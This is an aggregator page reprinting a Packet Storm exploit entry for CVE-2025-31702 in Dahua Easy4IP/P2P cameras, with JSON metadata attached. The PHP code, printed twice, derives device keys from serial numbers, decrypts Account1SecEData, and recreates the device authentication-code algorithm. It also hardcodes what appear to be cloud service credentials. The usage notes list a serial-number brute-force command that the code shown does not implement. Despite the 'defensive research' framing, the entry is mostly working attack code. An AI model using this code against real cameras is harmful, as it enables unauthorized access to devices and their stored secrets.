📄 Dahua TPC-AEBF5201 P2P Camera ToolsComplete Security Analysis Suite

6.8 / 10

MEDIUM

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

Description

This PHP proof-of-concept provides defensive tooling to analyze DH-P2P / Easy4IP behaviors observed during DFIR activities. It includes routines to decrypt Account1SecEData, derive device-specific cryptographic keys, and reproduce authentication code...

Visit Original Source

Basic Information

ID PACKETSTORM:213134

Published Dec 19, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Dahua TPC-AEBF5201 P2P Camera ToolsComplete Security Analysis Suite |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://www.dahuasecurity.com/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/212932/ & CVE-2025-31702

[+] Summary : This PHP proof-of-concept provides defensive tooling to analyze DH-P2P / Easy4IP behaviors observed during DFIR activities.
It includes routines to decrypt Account1SecEData, derive device-specific cryptographic keys, and reproduce authentication code generation logic.
The project is intended to support authorized security investigations, validation of exposure scenarios, and incident response analysis related to P2P connectivity and update mechanisms.
All code is provided strictly for defensive research and use in permitted environments only.

[+] Affected Version : The vulnerability impacts devices in the following Dahua series (when using Easy4IP / P2P features):

IPC-1XXX

IPC-2XXX

IPC-WX

IPC-ECXX

SD3A / SD2A / SD3D / SDT2A / SD2C

TPC-AEBF5201

TPC-CA

[+] Affected Firmware Versions :

All firmware builds with a build date before 1 July 2025 are affected

Firmware builds dated on or after 1 July 2025 are not affected

[+] POC :

# Decrypt file

php poc.php decrypt Account1SecEData.bin CLASS123 SERIAL456

# Generate authentication token

php poc.php auth --serial SERIAL123 --email [email protected]

# Search for serial numbers

php poc.php brute ABCDEFGHIJ --max 5000 --threads 10

# With debugging mode enabled

php poc.php brute ABCDEFGHIJ --debug

<?php
/**
* DH-P2P Security Tool (PoC)
* Author: indoushka
* Usage: php dhp2p_tool.php <command> [options]
*/

/* ===============================
Global Configuration
================================ */
define('MAIN_SERVER', 'www.easy4ipcloud.com');
define('MAIN_PORT', 8800);
define('USERNAME', 'cba1b29e32cb17aa46b8ff9e73c7f40b');
define('USERKEY', '996103384cdf19179e19243e959bbf8b');

/* ===============================
Utility Functions
================================ */

function xor_inc(string $data): string {
$out = '';
$len = strlen($data);
for ($i = 0; $i < $len; $i++) {
$out .= chr(ord($data[$i]) ^ (($i + 1) & 0xFF));
}
return $out;
}

function derive_key_hex(string $devcls, string $serial): string {
$seed = $devcls . $serial;
$x = xor_inc($seed);
return md5($x); // hex string
}

/* ===============================
1) Decrypt Account1SecEData
================================ */

function decrypt_edata(string $file, string $devcls, string $serial): string {
$blob = file_get_contents($file);
if ($blob === false) {
throw new Exception("Cannot read file");
}

$bs = 16;
$ivBlock = substr($blob, $bs, $bs);

$count = 0;
while (substr($blob, $bs + $count * $bs, $bs) === $ivBlock) {
$count++;
}

$offset = ($count + 1) * $bs;
$payload = substr($blob, $offset);

$keyHex = derive_key_hex($devcls, $serial);
$key = hex2bin($keyHex);

$decrypted = openssl_decrypt(
$payload,
'AES-128-ECB',
$key,
OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING
);

return $decrypted;
}

/* ===============================
2) Generate Auth Code
================================ */

function generate_auth_code(
string $serial,
string $mode = "1",
string $email = "[email protected]",
string $rand15 = "02DE420671479CE",
string $tail = "B",
int $timestamp = 0
): array {

$blob = implode("\n", [
$mode,
$serial,
(string)$timestamp,
$email,
"",
$rand15,
$tail
]);

$md5 = md5($blob);
$out = '';

for ($i = 0; $i < 8; $i++) {
$j = $i * 4;
if ($i % 3 === 0) {
$out .= $md5[$j + 3];
} elseif ($i % 7 === 0) {
$out .= $md5[$j + 1];
} else {
$out .= $md5[$j];
}
}

return [$md5, $out];
}

/* ===============================
CLI Interface
================================ */

if (php_sapi_name() !== 'cli') {
die("CLI only\n");
}

$argv = $_SERVER['argv'];
$cmd = $argv[1] ?? null;

try {

switch ($cmd) {

case 'decrypt':
if (count($argv) < 5) {
echo "Usage: php dhp2p_tool.php decrypt <file> <devcls> <serial>\n";
exit;
}
$pt = decrypt_edata($argv[2], $argv[3], $argv[4]);
$clean = ltrim($pt, "\x00");
if (($pos = strpos($clean, '{')) !== false) {
$json = substr($clean, $pos);
$obj = json_decode($json, true);
if ($obj !== null) {
echo json_encode($obj, JSON_PRETTY_PRINT) . PHP_EOL;
exit;
}
}
echo "=== TEXT ===\n";
echo $clean . "\n";
echo "=== HEX ===\n";
echo bin2hex($pt) . "\n";
break;

case 'auth':
$serial = $argv[2] ?? '';
if (!$serial) {
echo "Usage: php dhp2p_tool.php auth <serial>\n";
exit;
}
[$md5, $code] = generate_auth_code($serial);
echo "MD5 : $md5\n";
echo "Auth : $code\n";
break;

default:
echo <<<HELP
DH-P2P PHP Tool (PoC)

Commands:
decrypt <file> <devcls> <serial>
auth <serial>

HELP;
}

} catch (Throwable $e) {
fwrite(STDERR, "Error: {$e->getMessage()}\n");
exit(1);
}

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-19T17:19:43",
    "description": "This PHP proof-of-concept provides defensive tooling to analyze DH-P2P / Easy4IP behaviors observed during DFIR activities. It includes routines to decrypt Account1SecEData, derive device-specific cryptographic keys, and reproduce authentication code...",
    "published": "2025-12-19T00:00:00",
    "modified": "2025-12-19T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Dahua TPC-AEBF5201 P2P Camera ToolsComplete Security Analysis Suite",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:213134",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-31702"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Dahua TPC-AEBF5201 P2P Camera ToolsComplete Security Analysis Suite                                                         |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\n    | # Vendor    : https://www.dahuasecurity.com/                                                                                              |\n    =============================================================================================================================================\n    \n    [+] References : https://packetstorm.news/files/id/212932/ & \tCVE-2025-31702\n    \n    [+] Summary    : This PHP proof-of-concept provides defensive tooling to analyze DH-P2P / Easy4IP behaviors observed during DFIR activities. \n                     It includes routines to decrypt Account1SecEData, derive device-specific cryptographic keys, and reproduce authentication code generation logic. \n                     The project is intended to support authorized security investigations, validation of exposure scenarios, and incident response analysis related to P2P connectivity and update mechanisms. \n                     All code is provided strictly for defensive research and use in permitted environments only.\n    \n    [+] Affected Version : The vulnerability impacts devices in the following Dahua series (when using Easy4IP / P2P features):\n    \n    IPC-1XXX\n    \n    IPC-2XXX\n    \n    IPC-WX\n    \n    IPC-ECXX\n    \n    SD3A / SD2A / SD3D / SDT2A / SD2C\n    \n    TPC-AEBF5201\n    \n    TPC-CA\n    \n    [+] Affected Firmware Versions :\n    \n    All firmware builds with a build date before 1 July 2025 are affected\n    \n    Firmware builds dated on or after 1 July 2025 are not affected\n    \n    [+] POC : \n    \n    # Decrypt file\n    \n    php poc.php decrypt Account1SecEData.bin CLASS123 SERIAL456\n    \n    # Generate authentication token\n    \n    php poc.php auth --serial SERIAL123 --email [email protected]\n    \n    # Search for serial numbers\n    \n    php poc.php brute ABCDEFGHIJ --max 5000 --threads 10\n    \n    # With debugging mode enabled\n    \n    php poc.php brute ABCDEFGHIJ --debug\n    \n    <?php\n    /**\n     * DH-P2P Security Tool (PoC)\n     * Author: indoushka\n     * Usage: php dhp2p_tool.php <command> [options]\n     */\n    \n    /* ===============================\n       Global Configuration\n    ================================ */\n    define('MAIN_SERVER', 'www.easy4ipcloud.com');\n    define('MAIN_PORT', 8800);\n    define('USERNAME', 'cba1b29e32cb17aa46b8ff9e73c7f40b');\n    define('USERKEY',  '996103384cdf19179e19243e959bbf8b');\n    \n    /* ===============================\n       Utility Functions\n    ================================ */\n    \n    function xor_inc(string $data): string {\n        $out = '';\n        $len = strlen($data);\n        for ($i = 0; $i < $len; $i++) {\n            $out .= chr(ord($data[$i]) ^ (($i + 1) & 0xFF));\n        }\n        return $out;\n    }\n    \n    function derive_key_hex(string $devcls, string $serial): string {\n        $seed = $devcls . $serial;\n        $x = xor_inc($seed);\n        return md5($x); // hex string\n    }\n    \n    /* ===============================\n       1) Decrypt Account1SecEData\n    ================================ */\n    \n    function decrypt_edata(string $file, string $devcls, string $serial): string {\n        $blob = file_get_contents($file);\n        if ($blob === false) {\n            throw new Exception(\"Cannot read file\");\n        }\n    \n        $bs = 16;\n        $ivBlock = substr($blob, $bs, $bs);\n    \n        $count = 0;\n        while (substr($blob, $bs + $count * $bs, $bs) === $ivBlock) {\n            $count++;\n        }\n    \n        $offset = ($count + 1) * $bs;\n        $payload = substr($blob, $offset);\n    \n        $keyHex = derive_key_hex($devcls, $serial);\n        $key = hex2bin($keyHex);\n    \n        $decrypted = openssl_decrypt(\n            $payload,\n            'AES-128-ECB',\n            $key,\n            OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING\n        );\n    \n        return $decrypted;\n    }\n    \n    /* ===============================\n       2) Generate Auth Code\n    ================================ */\n    \n    function generate_auth_code(\n        string $serial,\n        string $mode = \"1\",\n        string $email = \"[email protected]\",\n        string $rand15 = \"02DE420671479CE\",\n        string $tail = \"B\",\n        int $timestamp = 0\n    ): array {\n    \n        $blob = implode(\"\\n\", [\n            $mode,\n            $serial,\n            (string)$timestamp,\n            $email,\n            \"\",\n            $rand15,\n            $tail\n        ]);\n    \n        $md5 = md5($blob);\n        $out = '';\n    \n        for ($i = 0; $i < 8; $i++) {\n            $j = $i * 4;\n            if ($i % 3 === 0) {\n                $out .= $md5[$j + 3];\n            } elseif ($i % 7 === 0) {\n                $out .= $md5[$j + 1];\n            } else {\n                $out .= $md5[$j];\n            }\n        }\n    \n        return [$md5, $out];\n    }\n    \n    /* ===============================\n       CLI Interface\n    ================================ */\n    \n    if (php_sapi_name() !== 'cli') {\n        die(\"CLI only\\n\");\n    }\n    \n    $argv = $_SERVER['argv'];\n    $cmd  = $argv[1] ?? null;\n    \n    try {\n    \n        switch ($cmd) {\n    \n            case 'decrypt':\n                if (count($argv) < 5) {\n                    echo \"Usage: php dhp2p_tool.php decrypt <file> <devcls> <serial>\\n\";\n                    exit;\n                }\n                $pt = decrypt_edata($argv[2], $argv[3], $argv[4]);\n                $clean = ltrim($pt, \"\\x00\");\n                if (($pos = strpos($clean, '{')) !== false) {\n                    $json = substr($clean, $pos);\n                    $obj = json_decode($json, true);\n                    if ($obj !== null) {\n                        echo json_encode($obj, JSON_PRETTY_PRINT) . PHP_EOL;\n                        exit;\n                    }\n                }\n                echo \"=== TEXT ===\\n\";\n                echo $clean . \"\\n\";\n                echo \"=== HEX ===\\n\";\n                echo bin2hex($pt) . \"\\n\";\n                break;\n    \n            case 'auth':\n                $serial = $argv[2] ?? '';\n                if (!$serial) {\n                    echo \"Usage: php dhp2p_tool.php auth <serial>\\n\";\n                    exit;\n                }\n                [$md5, $code] = generate_auth_code($serial);\n                echo \"MD5  : $md5\\n\";\n                echo \"Auth : $code\\n\";\n                break;\n    \n            default:\n                echo <<<HELP\n    DH-P2P PHP Tool (PoC)\n    \n    Commands:\n      decrypt <file> <devcls> <serial>\n      auth <serial>\n    \n    HELP;\n        }\n    \n    } catch (Throwable $e) {\n        fwrite(STDERR, \"Error: {$e->getMessage()}\\n\");\n        exit(1);\n    }\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/213134",
    "cvss": {
        "score": 6.8,
        "severity": "MEDIUM",
        "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/213134/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Dahua TPC-AEBF5201 P2P Camera ToolsComplete Security Analysis Suite_PACKETSTORM:213134

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply